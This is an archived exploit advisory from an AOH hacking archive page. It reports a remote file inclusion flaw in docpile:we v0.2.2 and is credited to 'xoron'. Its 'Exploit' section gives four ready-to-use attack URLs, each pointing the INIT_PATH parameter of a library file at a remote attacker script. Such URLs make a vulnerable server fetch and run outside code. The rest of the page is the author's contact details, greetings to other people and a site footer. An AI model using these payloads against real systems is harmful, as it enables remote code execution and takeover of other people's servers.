AOH :: HP Unsorted D :: B06-4109.HTM

docpile:we v0.2.2 (INIT_PATH) Remote File Inclusion Vulnerability



docpile:we v0.2.2 (INIT_PATH) Remote File Inclusion Vulnerability
docpile:we v0.2.2 (INIT_PATH) Remote File Inclusion Vulnerability



***********************************=0D
TiTLE: docpile:we  v0.2.2 (INIT_PATH) Remote File Inclusion Vulnerability=0D
-=0D
Author: xoron=0D
-=0D
Class : Remote=0D
-=0D
cont@ct: x0r0n[at]hotmail[dot]com=0D
-=0D
URL: http://docpile-we.berlios.de=0D 
-=0D
Exploit:=0D
http://www.site.com/[path]/lib/folder.class.php?INIT_PATH=http://evil_script?=0D 
http://www.site.com/[path]/lib/email.inc.php?INIT_PATH=http://evil_script?=0D 
http://www.site.com/[path]/lib/document.class.php?INIT_PATH=http://evil_script?=0D 
http://www.site.com/[path]/lib/auth.inc.php?INIT_PATH=http://evil_script?=0D 
-=0D
Greetz: str0ke, Preddy, Iron, x-master, DJR, R3D4C!D , sakkkure=0D
***************************************************=0D
=0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.